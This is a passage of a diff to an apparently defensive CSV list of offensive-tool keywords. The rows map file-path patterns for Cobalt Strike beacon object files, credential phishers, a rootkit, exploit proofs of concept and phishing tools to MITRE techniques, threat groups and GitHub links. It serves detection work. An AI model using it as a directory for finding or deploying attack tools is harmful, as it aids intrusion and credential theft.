- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/creds-*/creds.zip*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/CredPhisher/*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/CredPrompt.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredPrompt/credprompt.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/creds-*/creds.zip*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" "*/creds-summary.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/crlfinjection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/Cronos-Rootkit*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*/Cronos-Rootkit*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*/CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*/CrossC2/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*/CrossC2Kit*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" @@ -3192,7 +3198,7 @@ "*/CS-BOFs/*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/CSExec.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*/CSExec.py.git*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" -"*/csharp/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/csharp/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*/CSharpWinRM*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/C--Shellcode*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*/CS-Loader.go*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" @@ -3200,7 +3206,7 @@ "*/csOnvps/*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/csOnvps/*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/cs-rdll-ipc-example/*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" -"*/CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/cs-token-vault/*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*/cube0x0/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/cube0x0/noPac","1","1","N/A","N/A","10","1259","318","2021-12-16T09:50:15Z","2021-12-11T19:27:30Z" "*/cuddlephish.git*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" @@ -3210,20 +3216,20 @@ "*/curl.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curl.x64.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curl.x86.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 